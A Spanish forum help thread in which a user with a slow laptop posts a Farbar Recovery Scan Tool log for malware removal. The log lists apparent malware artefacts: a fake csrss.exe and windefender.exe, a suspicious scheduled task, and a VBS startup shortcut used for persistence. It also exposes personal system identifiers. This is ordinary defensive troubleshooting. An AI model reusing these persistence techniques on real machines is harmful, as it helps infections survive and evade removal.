Buenas tardes,
Llevo algunos días con el portátil lento y echando un vistazo al administrador de tareas veo que hay un programa llamad Wub.ex que me indica Windows que tiene un alto consumo de energía. He corrido el Adwcleaner pero no lo elimina. Y tampoco se identificar si tengo algún otro virus malwere.
¿podríais echarme una mano? Muchas gracias y feliz comienzo de año.
Hola @javier_getafe.
Descarga y ejecuta Farbar recoveru scan tool; pega el reporte para poder ayudarte.
Un saludo.
Buenas tardes, gracias por la ayuda. Definitivamente se me ha colado malware ya que se me ejecutan paginas al iniciar google 
Me han salido dos informes que he pegado en dos mensajes.
Gracias.
Resultado del análisis realizado por Farbar Recovery Scan Tool (FRST) (x64) Versión: 14-12-2020
Ejecutado por javier (administrador) sobre DESKTOP-DDRBOLI (Micro-Star International Co., Ltd. GE62 7RD) (03-01-2021 16:57:15)
Ejecutado desde C:\Users\javie\Desktop
Perfiles cargados: javier
Platform: Windows 10 Home Versión 2004 19041.685 (X64) Idioma: Español (España, internacional)
Navegador predeterminado: Chrome
Modo de Inicio: Normal
==================== Procesos (Lista blanca) =================
(Si una entrada es incluida en el fixlist, el proceso será cerrado. El archivo no será movido.)
() [Archivo no firmado] C:\Users\javier\AppData\Local\Temp\csrss\m672.exe
() [Archivo no firmado] C:\Users\javier\AppData\Local\Temp\csrss\mg20201223-1.exe
() [Archivo no firmado] C:\Users\javier\AppData\Local\Temp\csrss\ml20201223.exe
() [Archivo no firmado] C:\Users\javier\AppData\Local\Temp\csrss\pcstats.exe
() [Archivo no firmado] C:\Users\javier\AppData\Local\Temp\csrss\ww30.exe
() [Archivo no firmado] C:\Windows\rss\csrss.exe
() [Archivo no firmado] C:\Windows\windefender.exe
(Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe <26>
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe
(Google LLC -> Google) C:\Users\javie\AppData\Local\Google\Chrome\User Data\SwReporter\87.250.200\software_reporter_tool.exe <4>
(Intel(R) Embedded Subsystems and IP Blocks Group -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\dal.inf_amd64_ffc75848a6342fdf\jhi_service.exe
(Intel(R) pGFX 2020 -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_bdd37d808cfdf045\igfxCUIService.exe
(Intel(R) pGFX 2020 -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_bdd37d808cfdf045\igfxEM.exe
(Intel(R) pGFX 2020 -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_bdd37d808cfdf045\IntelCpHDCPSvc.exe
(Intel(R) pGFX 2020 -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_bdd37d808cfdf045\IntelCpHeciSvc.exe
(Intel(R) Wireless Connectivity Solutions -> Intel Corporation) C:\Windows\System32\ibtsiva.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.WindowsStore_12011.1001.1.0_x64__8wekyb3d8bbwe\WinStore.App.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\SecurityHealthHost.exe <2>
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\MsMpEng.exe
(Micro-Star International CO., LTD. -> Micro-Star International Co., Ltd.) [Archivo no firmado] C:\Program Files (x86)\MSI\Dragon Center\Dragon Center.exe
(MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) C:\Program Files (x86)\MSI\Dragon Center\MSI_ActiveX_Service.exe
(Micro-Star International Co., Ltd.) [Archivo no firmado] C:\Windows\SysWOW64\MSIService.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nvmii.inf_amd64_d89a89f9da6bfb4c\Display.NvContainer\NVDisplay.Container.exe <2>
(Rivet Networks LLC -> Rivet Networks LLC) C:\Windows\System32\drivers\RivetNetworks\Killer\KNDBWM.exe
(Rivet Networks LLC -> Rivet Networks LLC) C:\Windows\System32\drivers\RivetNetworks\Killer\KSPS.exe
(Rivet Networks LLC -> Rivet Networks LLC) C:\Windows\System32\drivers\RivetNetworks\Killer\xTendUtility.exe
(Rivet Networks LLC -> Rivet Networks) C:\Windows\System32\drivers\RivetNetworks\Killer\KillerAnalyticsService.exe
(Rivet Networks LLC -> Rivet Networks) C:\Windows\System32\drivers\RivetNetworks\Killer\KillerNetworkService.exe
(Rivet Networks LLC -> Rivet Networks, LLC.) C:\Windows\System32\drivers\RivetNetworks\Killer\KNDBWMService.exe
(Rivet Networks LLC -> Rivet Networks, LLC.) C:\Windows\System32\drivers\RivetNetworks\Killer\KSPSService.exe
(Rivet Networks LLC -> Rivet Networks, LLC.) C:\Windows\System32\drivers\RivetNetworks\Killer\xTendUtilityService.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Windows\System32\SynTPEnh.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Windows\System32\SynTPEnhService.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Windows\System32\SynTPHelper.exe
==================== Registro (Lista blanca) ===================
(Si una entrada es incluida en el fixlist, el elemento del registro será restaurado a su valor predeterminado o será eliminado. El archivo no será movido.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [9240512 2017-12-21] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKU\S-1-5-19\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518656 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-20\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518656 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-21-3503952492-1416054308-399170389-1001\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [32414392 2020-12-08] (Piriform Software Ltd -> Piriform Software Ltd)
HKU\S-1-5-21-3503952492-1416054308-399170389-1001\...\Run: [CCXProcess] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe [144008 2019-11-26] (Adobe Inc. -> Adobe Systems Incorporated)
HKU\S-1-5-21-3503952492-1416054308-399170389-1001\...\Run: [com.squirrel.Teams.Teams] => C:\Users\javie\AppData\Local\Microsoft\Teams\Update.exe [2452112 2020-09-10] (Microsoft 3rd Party Application Component -> Microsoft Corporation)
HKU\S-1-5-21-3503952492-1416054308-399170389-1001\...\Run: [GarminExpress] => C:\Program Files (x86)\Garmin\Express\express.exe [31046640 2020-09-21] (Garmin International, Inc. -> Garmin Ltd. or its subsidiaries)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\87.0.4280.88\Installer\chrmstp.exe [2020-12-08] (Google LLC -> Google LLC)
Startup: C:\Users\javie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Lr.worker.dll.lnk [2020-05-21]
ShortcutAndArgument: Lr.worker.dll.lnk -> C:\Windows\system32\wscript.exe => /E:vbscript "C:\Users\javie\AppData\Roaming\Lr.worker.dll.vbs"
==================== Tareas programadas (Lista blanca) ============
(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)
Task: {0FAB5A93-9D08-4861-905F-FE5AB8E37BFD} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {0FD87920-2B29-4452-B407-D996B3BE5F71} - System32\Tasks\MSI_Dragon Center => C:\Program Files (x86)\MSI\Dragon Center\Dragon Center.exe [5122840 2017-05-31] (Micro-Star International CO., LTD. -> Micro-Star International Co., Ltd.) [Archivo no firmado]
Task: {13E9591E-85B3-45F9-A723-7E23C9C36BDF} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1349200 2020-11-03] (Adobe Inc. -> Adobe Inc.)
Task: {2C2DCF33-CB0F-4A34-A3FD-9BD5ED03415C} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-04-08] (Google LLC -> Google LLC)
Task: {30C522E1-111A-445D-813D-3B3350436596} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {41C45A75-6195-4029-80D5-7BF243BF5C24} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {56970DCE-B923-45F0-A5CC-39CC6F14AD3F} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-04-08] (Google LLC -> Google LLC)
Task: {6D52C5D1-63A5-4726-BCBA-ED07A2F70068} - System32\Tasks\GarminUpdaterTask => C:\Program Files (x86)\Garmin\Express SelfUpdater\ExpressSelfUpdater.exe [40432 2020-09-21] (Garmin International, Inc. -> )
Task: {799B8342-9E31-475F-8BA7-B3BCA54ACF38} - System32\Tasks\MSI_Help_Desk_Agent => C:\Program Files (x86)\MSI\Help Desk\MSI Update Agent.exe
Task: {7F07EB54-1BD2-4142-8369-8FF0DDE4AAFE} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [907240 2020-04-07] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {933B1409-05E0-46B9-BBCE-A92E74984723} - System32\Tasks\csrss => C:\WINDOWS\rss\csrss.exe [4475904 2021-01-02] () [Archivo no firmado] <==== ATENCIÓN
Task: {98116182-04A4-400A-8706-50D1228A5DBE} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [907240 2020-04-07] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {C0B2E7B6-3F38-4FA0-83E4-792714B39268} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {C49D76DC-690A-4D68-810C-CDF4BBB79155} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [26896568 2020-12-08] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {E9D9FD5A-513B-4D86-AC39-3D1BCBB1A125} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [686384 2020-12-08] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {F646FAB3-C0FB-4DBF-B3A8-18054CBEFB59} - System32\Tasks\Dragon_Center_updater => C:\ProgramData\MSI\Dragon [Argument = Center\DragonCenter_Updater.exe DragonCenter]
Task: {F9D0138C-662F-4CF9-A87F-591BA9612FEE} - System32\Tasks\CreateExplorerShellUnelevatedTask => C:\Windows\explorer.exe /NOUACCHECK
(Si una entrada es incluida en el fixlist, el archivo de tarea (.job) será movido. El archivo que está siendo ejecutado por la tarea no será movido.)
==================== Internet (Lista blanca) ====================
(Si un elemento es incluido en el fixlist, y éste pertenece al registro, será eliminado o restaurado a su valor predeterminado.)
Hosts: Hay más de una entrada en Hosts. Consulte la sección Hosts de Addition.txt
Tcpip\Parameters: [DhcpNameServer] 212.166.210.80 212.166.132.104
Tcpip\..\Interfaces\{3c1a82af-d745-4f2e-84b3-f006cc44b028}: [DhcpNameServer] 212.166.210.80 212.166.132.104
Edge:
======
Edge DefaultProfile: Default
Edge Profile: C:\Users\javie\AppData\Local\Microsoft\Edge\User Data\Default [2021-01-02]
Edge DownloadDir: C:\Users\javie\Downloads
Edge HomePage: Default -> hxxps://www.google.es/
FireFox:
========
FF HKU\S-1-5-21-3503952492-1416054308-399170389-1001\...\Firefox\Extensions: [[email protected]] - C:\Users\javie\AppData\Roaming\ACEStream\extensions\awe\firefox\acewebextension_unlisted.xpi => no encontrado
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2020-12-07] (Adobe Inc. -> Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-3503952492-1416054308-399170389-1001: @zoom.us/ZoomVideoPlugin -> C:\Users\javie\AppData\Roaming\Zoom\bin\npzoomplugin.dll [2020-05-14] (Zoom Video Communications, Inc. -> Zoom Video Communications, Inc.)
Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\javie\AppData\Local\Google\Chrome\User Data\Default [2021-01-03]
CHR DownloadDir: C:\Users\javie\Downloads
CHR HomePage: Default -> hxxps://www.google.es/
CHR StartupUrls: Default -> "hxxp://somebooks.es/evitar-que-chrome-chromium-muestre-miniaturas-en-la-pagina-de-inicio/","chrome://newtab/"
CHR Extension: (Presentaciones) - C:\Users\javie\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2020-01-22]
CHR Extension: (Documentos) - C:\Users\javie\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2020-01-22]
CHR Extension: (Google Drive) - C:\Users\javie\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-10-21]
CHR Extension: (YouTube) - C:\Users\javie\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2020-01-22]
CHR Extension: (Hojas de cálculo) - C:\Users\javie\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2020-01-22]
CHR Extension: (Documentos de Google sin conexión) - C:\Users\javie\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-11-12]
CHR Extension: (dataslayer) - C:\Users\javie\AppData\Local\Google\Chrome\User Data\Default\Extensions\ikbablmmjldhamhcldjjigniffkkjgpo [2020-12-06]
CHR Extension: (GPX Viewer, Reader) - C:\Users\javie\AppData\Local\Google\Chrome\User Data\Default\Extensions\jcoebkjfbobjheeoclnjkfgginlaefnb [2020-02-16]
CHR Extension: (Tag Assistant (by Google)) - C:\Users\javie\AppData\Local\Google\Chrome\User Data\Default\Extensions\kejbdjndbnbjgmefkgdddjlbokphdefk [2020-11-16]
CHR Extension: (Sistema de pagos de Chrome Web Store) - C:\Users\javie\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2020-01-22]
CHR Extension: (Gmail) - C:\Users\javie\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-10-22]
CHR Extension: (Chrome Media Router) - C:\Users\javie\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2021-01-02]
CHR HKU\S-1-5-21-3503952492-1416054308-399170389-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [mjbepbhonbojpoaenhckjocchgfiaofo]
==================== Servicios (Lista blanca) ===================
(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)
R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [170056 2020-11-03] (Adobe Inc. -> Adobe Inc.)
S3 KAPSService; C:\WINDOWS\System32\drivers\RivetNetworks\Killer\KAPSService.exe [73720 2020-03-13] (Rivet Networks LLC -> Rivet Networks, LLC.)
R2 Killer Analytics Service; C:\WINDOWS\System32\drivers\RivetNetworks\Killer\KillerAnalyticsService.exe [1775624 2020-03-13] (Rivet Networks LLC -> Rivet Networks)
R2 Killer Network Service; C:\WINDOWS\System32\drivers\RivetNetworks\Killer\KillerNetworkService.exe [2665992 2020-03-13] (Rivet Networks LLC -> Rivet Networks)
R2 KillerSmartphoneSleepService; C:\WINDOWS\System32\drivers\RivetNetworks\Killer\KSPSService.exe [73720 2020-03-13] (Rivet Networks LLC -> Rivet Networks, LLC.)
R3 KNDBWM; C:\WINDOWS\System32\drivers\RivetNetworks\Killer\KNDBWMService.exe [73720 2020-03-13] (Rivet Networks LLC -> Rivet Networks, LLC.)
R2 Micro Star SCM; C:\Windows\SysWOW64\MSIService.exe [160768 2009-07-09] (Micro-Star International Co., Ltd.) [Archivo no firmado]
R2 MSI_ActiveX_Service; C:\Program Files (x86)\MSI\Dragon Center\MSI_ActiveX_Service.exe [62392 2017-04-24] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.)
S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\NisSrv.exe [2491880 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MsMpEng.exe [128376 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefender; C:\WINDOWS\windefender.exe [1987072 2021-01-02] () [Archivo no firmado]
S2 xTendSoftAPService; C:\WINDOWS\System32\drivers\RivetNetworks\Killer\xTendSoftAPService.exe [73728 2020-03-13] (Rivet Networks LLC -> Rivet Networks, LLC.)
R2 xTendUtilityService; C:\WINDOWS\System32\drivers\RivetNetworks\Killer\xTendUtilityService.exe [73736 2020-03-13] (Rivet Networks LLC -> Rivet Networks, LLC.)
R2 NVDisplay.ContainerLocalSystem; C:\WINDOWS\System32\DriverStore\FileRepository\nvmii.inf_amd64_d89a89f9da6bfb4c\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f %ProgramData%\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\WINDOWS\System32\DriverStore\FileRepository\nvmii.inf_amd64_d89a89f9da6bfb4c\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem
===================== Controladores (Lista blanca) ===================
(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)
S3 AppleLowerFilter; C:\WINDOWS\System32\drivers\AppleLowerFilter.sys [35976 2020-10-09] (WDKTestCert build,132303256403278908 -> Apple Inc.)
R3 KfeCoSvc; C:\WINDOWS\System32\drivers\RivetNetworks\Killer\KfeCo10X64.sys [178824 2020-03-13] (Rivet Networks LLC -> Rivet Networks, LLC.)
R3 ssps2; C:\WINDOWS\System32\drivers\ssps2.sys [41104 2019-08-27] (SteelSeries ApS -> )
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [48536 2020-12-04] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [429296 2020-12-04] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [70896 2020-12-04] (Microsoft Windows -> Microsoft Corporation)
R3 WINIO; C:\Program Files (x86)\MSI\Dragon Center\winio64.sys [15160 2015-06-11] (Micro-Star Int'l Co. Ltd. -> )
S3 MpKsl589a5587; \??\C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{6FF4E5FC-A5DA-4C44-BD34-018944230444}\MpKslDrv.sys [X]
==================== NetSvcs (Lista blanca) ===================
(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)
==================== Un mes (creado) (Lista blanca) =========
(Si una entrada es incluida en el fixlist, el archivo/carpeta será eliminado/a.)
2021-01-03 16:57 - 2021-01-03 16:59 - 000019265 _____ C:\Users\javie\Desktop\FRST.txt
2021-01-03 16:55 - 2021-01-03 16:58 - 000000000 ____D C:\FRST
2021-01-03 16:52 - 2021-01-03 16:52 - 002286592 _____ (Farbar) C:\Users\javie\Desktop\FRST64.exe
2021-01-03 15:58 - 2021-01-03 16:00 - 000000000 ____D C:\WINDOWS\Minidump
2021-01-03 10:13 - 2021-01-03 10:13 - 001802704 _____ (Bleeping Computer, LLC) C:\Users\javie\Downloads\rkill.com
2021-01-03 10:02 - 2021-01-03 10:02 - 006455520 _____ (EnigmaSoft Limited) C:\Users\javie\Downloads\SpyHunter-Installer.exe
2021-01-02 21:39 - 2021-01-02 21:39 - 001987072 ____H C:\WINDOWS\windefender.exe
2021-01-02 18:19 - 2021-01-02 21:36 - 000000000 ____D C:\AdwCleaner
2021-01-02 15:29 - 2021-01-02 16:13 - 000000013 _____ C:\ProgramData\kaosdma.txt
2021-01-02 15:21 - 2021-01-03 16:48 - 000003274 _____ C:\WINDOWS\system32\Tasks\csrss
2021-01-02 15:21 - 2021-01-02 15:21 - 000000000 ___HD C:\WINDOWS\rss
2020-12-23 21:30 - 2020-12-23 21:30 - 000004608 _____ C:\WINDOWS\SECOH-QAD.exe
2020-12-17 15:09 - 2020-12-17 15:09 - 001183217 _____ C:\Users\javie\AppData\Roaming\530354923
2020-12-11 18:40 - 2020-12-11 18:40 - 002755584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.tlb
2020-12-11 18:39 - 2020-12-11 18:39 - 002755584 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.tlb
2020-12-11 18:39 - 2020-12-11 18:39 - 001333248 _____ C:\WINDOWS\SysWOW64\TextInputMethodFormatter.dll
2020-12-11 18:39 - 2020-12-11 18:39 - 000266240 _____ C:\WINDOWS\SysWOW64\Windows.Internal.UI.Shell.WindowTabManager.dll
2020-12-11 18:39 - 2020-12-11 18:39 - 000100864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ncpa.cpl
2020-12-11 18:39 - 2020-12-11 18:39 - 000039936 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2020-12-11 18:39 - 2020-12-11 18:39 - 000010912 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2020-12-11 18:38 - 2020-12-11 18:38 - 001822272 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2020-12-11 18:38 - 2020-12-11 18:38 - 001393496 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2020-12-11 18:38 - 2020-12-11 18:38 - 000240640 _____ C:\WINDOWS\SysWOW64\CoreMas.dll
2020-12-11 18:38 - 2020-12-11 18:38 - 000102912 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncpa.cpl
2020-12-11 18:38 - 2020-12-11 18:38 - 000060928 _____ C:\WINDOWS\system32\runexehelper.exe
2020-12-11 18:38 - 2020-12-11 18:38 - 000048640 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2020-12-11 18:38 - 2020-12-11 18:38 - 000010752 _____ C:\WINDOWS\SysWOW64\agentactivationruntimestarter.exe
2020-12-11 18:38 - 2020-12-11 18:38 - 000001370 _____ C:\WINDOWS\system32\ThirdPartyNoticesBySHS.txt
2020-12-11 18:37 - 2020-12-11 18:37 - 002260480 _____ C:\WINDOWS\system32\TextInputMethodFormatter.dll
2020-12-11 18:37 - 2020-12-11 18:37 - 000363520 _____ C:\WINDOWS\system32\Windows.Internal.UI.Shell.WindowTabManager.dll
2020-12-11 18:37 - 2020-12-11 18:37 - 000287232 _____ C:\WINDOWS\system32\CoreMas.dll
2020-12-11 18:37 - 2020-12-11 18:37 - 000165376 _____ C:\WINDOWS\system32\DataStoreCacheDumpTool.exe
2020-12-11 18:37 - 2020-12-11 18:37 - 000089088 _____ C:\WINDOWS\system32\windows.applicationmodel.conversationalagent.proxystub.dll
2020-12-11 18:37 - 2020-12-11 18:37 - 000073216 _____ C:\WINDOWS\system32\windows.applicationmodel.conversationalagent.internal.proxystub.dll
2020-12-11 18:37 - 2020-12-11 18:37 - 000013312 _____ C:\WINDOWS\system32\agentactivationruntimestarter.exe
2020-12-06 08:44 - 2020-12-06 08:45 - 000000000 ____D C:\Users\javie\Desktop\Keynote
==================== Un mes (modificado) ==================
(Si una entrada es incluida en el fixlist, el archivo/carpeta será eliminado/a.)
2021-01-03 16:49 - 2020-02-14 16:41 - 000000000 ____D C:\Program Files\CCleaner
2021-01-03 16:48 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2021-01-03 16:47 - 2020-08-07 09:17 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2021-01-03 16:47 - 2020-08-07 08:46 - 000008192 ___SH C:\DumpStack.log.tmp
2021-01-03 16:46 - 2019-12-07 10:03 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2021-01-03 16:45 - 2020-08-07 08:01 - 000000000 ____D C:\Users\javie
2021-01-03 16:45 - 2020-02-17 21:47 - 000011743 _____ C:\ProgramData\DisplaySessionContainer1.log_backup1
2021-01-03 16:45 - 2020-02-17 21:06 - 000018856 _____ C:\ProgramData\NVDisplay.ContainerLocalSystem.log_backup1
2021-01-03 16:45 - 2020-02-17 21:06 - 000016578 _____ C:\ProgramData\NVDisplayContainerWatchdog.log_backup1
2021-01-03 16:00 - 2019-12-07 10:13 - 000000000 ____D C:\WINDOWS\INF
2021-01-03 15:58 - 2020-08-07 08:46 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2021-01-03 15:58 - 2020-08-06 21:41 - 002528553 ____N C:\WINDOWS\Minidump\010321-35343-01.dmp
2021-01-03 15:58 - 2020-02-17 21:06 - 000001206 _____ C:\ProgramData\NvcDispCorePlugin.log_backup1
2021-01-02 22:18 - 2020-01-22 20:52 - 000000000 ____D C:\ProgramData\Riot Games
2021-01-02 21:36 - 2020-02-17 23:45 - 000011741 _____ C:\ProgramData\DisplaySessionContainer2.log_backup1
2021-01-02 19:38 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\LiveKernelReports
2021-01-02 19:15 - 2020-04-08 15:10 - 000000000 ____D C:\ProgramData\Malwarebytes
2021-01-02 19:00 - 2020-08-07 09:17 - 000003936 _____ C:\WINDOWS\system32\Tasks\CCleaner Update
2021-01-02 18:27 - 2020-07-18 17:01 - 000000000 ____D C:\Users\javie\Desktop\100MEDIA
2021-01-02 17:54 - 2020-01-22 23:43 - 000000000 ____D C:\Users\javie\AppData\Roaming\Anki2
2021-01-02 17:09 - 2020-01-23 20:52 - 000000000 ____D C:\Users\javie\AppData\Roaming\uTorrent
2021-01-02 17:09 - 2020-01-22 23:20 - 000000000 ____D C:\Users\javie\AppData\Roaming\MPC-HC
2021-01-02 15:38 - 2020-08-07 08:46 - 000439624 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2021-01-02 15:24 - 2020-10-04 16:16 - 000000000 ____D C:\Users\javie\AppData\LocalLow\uTorrent
2021-01-02 15:24 - 2020-01-22 23:36 - 000000000 ____D C:\Users\javie\AppData\Local\BitTorrentHelper
2021-01-01 23:50 - 2020-09-03 18:10 - 000014260 _____ C:\ProgramData\DisplaySessionContainer49.log_backup1
2021-01-01 18:49 - 2020-09-02 23:03 - 000014271 _____ C:\ProgramData\DisplaySessionContainer48.log_backup1
2021-01-01 13:10 - 2020-09-02 22:26 - 000014253 _____ C:\ProgramData\DisplaySessionContainer47.log_backup1
2021-01-01 13:09 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps
2021-01-01 13:09 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2020-12-31 18:25 - 2020-09-02 18:48 - 000014579 _____ C:\ProgramData\DisplaySessionContainer46.log_backup1
2020-12-31 14:57 - 2020-09-02 10:35 - 000014255 _____ C:\ProgramData\DisplaySessionContainer45.log_backup1
2020-12-31 11:04 - 2020-09-01 23:00 - 000014458 _____ C:\ProgramData\DisplaySessionContainer44.log_backup1
2020-12-31 00:10 - 2020-09-01 17:14 - 000014260 _____ C:\ProgramData\DisplaySessionContainer43.log_backup1
2020-12-30 18:59 - 2020-09-01 06:55 - 000014266 _____ C:\ProgramData\DisplaySessionContainer42.log_backup1
